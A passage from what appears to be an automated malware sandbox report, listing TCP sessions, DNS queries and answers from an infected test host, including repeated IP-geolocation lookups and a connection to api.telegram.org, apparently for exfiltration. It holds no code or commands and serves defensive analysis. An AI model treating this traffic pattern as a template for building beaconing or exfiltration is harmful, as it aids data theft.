                                                                                                                                  Nov 19, 2024 18:08:12.766572952 CET44349164188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:12.766630888 CET49164443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:12.774578094 CET49164443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:13.622941017 CET4916280192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:13.628433943 CET8049162193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:13.628513098 CET4916280192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:13.662142992 CET4916580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:13.667002916 CET8049165193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:13.667052984 CET4916580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:13.667134047 CET4916580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:13.672261953 CET8049165193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.160260916 CET8049165193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.160502911 CET4916580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:14.167557955 CET8049165193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.167648077 CET4916580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:14.183079004 CET49166443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:14.183113098 CET44349166188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.183182001 CET49166443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:14.183593035 CET49166443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:14.183608055 CET44349166188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.653073072 CET44349166188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.658344030 CET49166443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:14.658422947 CET44349166188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.809524059 CET44349166188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.809593916 CET44349166188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.809739113 CET49166443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:14.810239077 CET49166443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:14.868482113 CET4916780192.168.2.22158.101.44.242
                                                                                                                                  Nov 19, 2024 18:08:14.873400927 CET8049167158.101.44.242192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.873955011 CET4916780192.168.2.22158.101.44.242
                                                                                                                                  Nov 19, 2024 18:08:14.873955011 CET4916780192.168.2.22158.101.44.242
                                                                                                                                  Nov 19, 2024 18:08:14.878861904 CET8049167158.101.44.242192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:15.450604916 CET8049167158.101.44.242192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:15.481357098 CET49168443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:15.481451035 CET44349168188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:15.481534958 CET49168443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:15.481847048 CET49168443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:15.481878042 CET44349168188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:15.651798964 CET4916780192.168.2.22158.101.44.242
                                                                                                                                  Nov 19, 2024 18:08:15.961772919 CET44349168188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:15.975033045 CET49168443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:15.975073099 CET44349168188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:16.109462023 CET44349168188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:16.109534025 CET44349168188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:16.109596014 CET49168443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:16.110797882 CET49168443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:16.126342058 CET4916780192.168.2.22158.101.44.242
                                                                                                                                  Nov 19, 2024 18:08:16.131500006 CET8049167158.101.44.242192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:16.131755114 CET4916780192.168.2.22158.101.44.242
                                                                                                                                  Nov 19, 2024 18:08:16.152602911 CET4916980192.168.2.22132.226.8.169
                                                                                                                                  Nov 19, 2024 18:08:16.157496929 CET8049169132.226.8.169192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:16.157572031 CET4916980192.168.2.22132.226.8.169
                                                                                                                                  Nov 19, 2024 18:08:16.157659054 CET4916980192.168.2.22132.226.8.169
                                                                                                                                  Nov 19, 2024 18:08:16.162415028 CET8049169132.226.8.169192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:17.776053905 CET8049169132.226.8.169192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:17.806382895 CET49170443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:17.806412935 CET44349170188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:17.806570053 CET49170443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:17.829405069 CET49170443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:17.829421043 CET44349170188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:17.976305008 CET4916980192.168.2.22132.226.8.169
                                                                                                                                  Nov 19, 2024 18:08:18.304811954 CET44349170188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.309379101 CET49170443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:18.309406042 CET44349170188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.460526943 CET44349170188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.460613012 CET44349170188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.460648060 CET49170443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:18.465471983 CET49170443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:18.613153934 CET4916980192.168.2.22132.226.8.169
                                                                                                                                  Nov 19, 2024 18:08:18.780680895 CET8049169132.226.8.169192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.780744076 CET4916980192.168.2.22132.226.8.169
                                                                                                                                  Nov 19, 2024 18:08:18.811197996 CET4917180192.168.2.22132.226.247.73
                                                                                                                                  Nov 19, 2024 18:08:18.816095114 CET8049171132.226.247.73192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.816247940 CET4917180192.168.2.22132.226.247.73
                                                                                                                                  Nov 19, 2024 18:08:18.816247940 CET4917180192.168.2.22132.226.247.73
                                                                                                                                  Nov 19, 2024 18:08:18.821286917 CET8049171132.226.247.73192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:19.480195999 CET8049171132.226.247.73192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:19.501032114 CET49172443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:19.501084089 CET44349172188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:19.501153946 CET49172443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:19.501463890 CET49172443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:19.501477003 CET44349172188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:19.689795017 CET8049171132.226.247.73192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:19.689970016 CET4917180192.168.2.22132.226.247.73
                                                                                                                                  Nov 19, 2024 18:08:19.985559940 CET44349172188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:19.988693953 CET49172443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:19.988727093 CET44349172188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.130886078 CET44349172188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.130950928 CET44349172188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.131038904 CET49172443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:20.131593943 CET49172443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:20.144882917 CET4917180192.168.2.22132.226.247.73
                                                                                                                                  Nov 19, 2024 18:08:20.152456999 CET8049171132.226.247.73192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.152519941 CET4917180192.168.2.22132.226.247.73
                                                                                                                                  Nov 19, 2024 18:08:20.170640945 CET4917380192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:20.177289963 CET8049173193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.177361012 CET4917380192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:20.177447081 CET4917380192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:20.184554100 CET8049173193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.636312008 CET8049173193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.666198969 CET49174443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:20.666249037 CET44349174188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.666296959 CET49174443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:20.666774988 CET49174443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:20.666789055 CET44349174188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.845897913 CET8049173193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.846075058 CET4917380192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:21.124653101 CET44349174188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.127654076 CET49174443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:21.127675056 CET44349174188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.283999920 CET44349174188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.284060955 CET44349174188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.284231901 CET49174443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:21.284574986 CET49174443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:21.297738075 CET4917380192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:21.303157091 CET8049173193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.303260088 CET4917380192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:21.325243950 CET4917580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:21.330111980 CET8049175193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.330209017 CET4917580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:21.330288887 CET4917580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:21.335113049 CET8049175193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.808851004 CET8049175193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.833126068 CET49176443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:21.833152056 CET44349176188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.833226919 CET49176443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:21.833570957 CET49176443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:21.833584070 CET44349176188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:22.016658068 CET4917580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:22.017802000 CET8049175193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:22.018620968 CET4917580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:22.294511080 CET44349176188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:22.298572063 CET49176443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:22.298588991 CET44349176188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:22.464495897 CET44349176188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:22.464555025 CET44349176188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:22.464601040 CET49176443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:22.465502024 CET49176443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:22.494158030 CET4917580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:22.511810064 CET8049175193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:22.511888981 CET4917580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:22.525671959 CET4917780192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:22.530544043 CET8049177193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:22.530597925 CET4917780192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:22.530744076 CET4917780192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:22.535531998 CET8049177193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.000313997 CET8049177193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.014161110 CET49178443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:23.014178991 CET44349178188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.014347076 CET49178443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:23.014494896 CET49178443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:23.014501095 CET44349178188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.202380896 CET4917780192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:23.205885887 CET8049177193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.205955029 CET4917780192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:23.490422964 CET44349178188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.493143082 CET49178443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:23.493170023 CET44349178188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.665391922 CET44349178188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.665465117 CET44349178188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.665828943 CET49178443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:23.666157961 CET49178443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:23.676753044 CET4917780192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:23.682018995 CET8049177193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.682158947 CET4917780192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:23.690716982 CET49179443192.168.2.22149.154.167.220
                                                                                                                                  Nov 19, 2024 18:08:23.690759897 CET44349179149.154.167.220192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.690828085 CET49179443192.168.2.22149.154.167.220
                                                                                                                                  Nov 19, 2024 18:08:23.691301107 CET49179443192.168.2.22149.154.167.220
                                                                                                                                  Nov 19, 2024 18:08:23.691313982 CET44349179149.154.167.220192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:24.313009024 CET44349179149.154.167.220192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:24.313086987 CET49179443192.168.2.22149.154.167.220
                                                                                                                                  Nov 19, 2024 18:08:24.322685957 CET49179443192.168.2.22149.154.167.220
                                                                                                                                  Nov 19, 2024 18:08:24.322700977 CET44349179149.154.167.220192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:24.323035955 CET44349179149.154.167.220192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:24.329088926 CET49179443192.168.2.22149.154.167.220
                                                                                                                                  Nov 19, 2024 18:08:24.371332884 CET44349179149.154.167.220192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:24.558121920 CET44349179149.154.167.220192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:24.558340073 CET44349179149.154.167.220192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:24.558396101 CET49179443192.168.2.22149.154.167.220
                                                                                                                                  Nov 19, 2024 18:08:24.564076900 CET49179443192.168.2.22149.154.167.220

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Nov 19, 2024 18:08:10.122873068 CET5456253192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:10.129576921 CET53545628.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:10.202476978 CET5291753192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:10.208796024 CET53529178.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:10.910541058 CET6275153192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:10.920517921 CET53627518.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:13.645642996 CET5789353192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:13.652641058 CET53578938.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:13.655549049 CET5482153192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:13.661705017 CET53548218.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.168421030 CET5471953192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:14.182514906 CET53547198.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.850339890 CET4988153192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:14.857186079 CET53498818.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.860622883 CET5499853192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:14.867940903 CET53549988.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:15.457833052 CET5278153192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:15.470320940 CET53527818.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:15.470510006 CET5278153192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:15.480706930 CET53527818.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:16.133650064 CET6392653192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:16.140425920 CET53639268.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:16.145342112 CET6551053192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:16.151920080 CET53655108.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:17.787926912 CET6267253192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:17.795407057 CET53626728.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.627523899 CET5647553192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:18.781019926 CET53564758.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.781296968 CET5647553192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:18.789735079 CET53564758.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.797750950 CET4938453192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:18.804195881 CET53493848.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.804408073 CET4938453192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:18.810791969 CET53493848.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:19.487054110 CET5484253192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:19.500627041 CET53548428.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.150276899 CET5810553192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:20.159538031 CET53581058.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.161559105 CET6492853192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:20.170249939 CET53649288.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:20.658600092 CET5739053192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:20.665714979 CET53573908.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.303122044 CET5809553192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:21.309560061 CET53580958.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.312021971 CET5426153192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:21.318320036 CET53542618.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.318536043 CET5426153192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET53542618.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:21.822781086 CET6050753192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:21.829715014 CET53605078.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:22.504792929 CET5044653192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:22.512157917 CET53504468.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:22.519156933 CET5593953192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:22.525257111 CET53559398.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.006308079 CET4960853192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:23.013624907 CET53496088.8.8.8192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:23.683727980 CET6148653192.168.2.228.8.8.8
                                                                                                                                  Nov 19, 2024 18:08:23.690304995 CET53614868.8.8.8192.168.2.22

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Nov 19, 2024 18:08:10.122873068 CET192.168.2.228.8.8.80xb03cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.202476978 CET192.168.2.228.8.8.80xe257Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.910541058 CET192.168.2.228.8.8.80xb2d1Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.645642996 CET192.168.2.228.8.8.80x3d65Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:13.655549049 CET192.168.2.228.8.8.80x4211Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.168421030 CET192.168.2.228.8.8.80x7bd9Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.850339890 CET192.168.2.228.8.8.80xca0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:14.860622883 CET192.168.2.228.8.8.80xeb28Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:15.457833052 CET192.168.2.228.8.8.80x786dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:15.470510006 CET192.168.2.228.8.8.80x786dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.133650064 CET192.168.2.228.8.8.80x2362Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:16.145342112 CET192.168.2.228.8.8.80xbf88Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:17.787926912 CET192.168.2.228.8.8.80xba1eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.627523899 CET192.168.2.228.8.8.80xc616Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.781296968 CET192.168.2.228.8.8.80xc616Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.797750950 CET192.168.2.228.8.8.80x7bfStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:18.804408073 CET192.168.2.228.8.8.80x7bfStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:19.487054110 CET192.168.2.228.8.8.80xb75fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.150276899 CET192.168.2.228.8.8.80xe13Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.161559105 CET192.168.2.228.8.8.80xa689Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:20.658600092 CET192.168.2.228.8.8.80x766cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.303122044 CET192.168.2.228.8.8.80x5282Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.312021971 CET192.168.2.228.8.8.80x483bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.318536043 CET192.168.2.228.8.8.80x483bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.822781086 CET192.168.2.228.8.8.80x2cd2Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.504792929 CET192.168.2.228.8.8.80x250cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:22.519156933 CET192.168.2.228.8.8.80x18abStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:23.006308079 CET192.168.2.228.8.8.80xdbe7Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:23.683727980 CET192.168.2.228.8.8.80x8295Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Nov 19, 2024 18:08:10.129576921 CET8.8.8.8192.168.2.220xb03cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.129576921 CET8.8.8.8192.168.2.220xb03cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.129576921 CET8.8.8.8192.168.2.220xb03cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.129576921 CET8.8.8.8192.168.2.220xb03cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.129576921 CET8.8.8.8192.168.2.220xb03cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.129576921 CET8.8.8.8192.168.2.220xb03cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.208796024 CET8.8.8.8192.168.2.220xe257No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:10.208796024 CET8.8.8.8192.168.2.220xe257No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
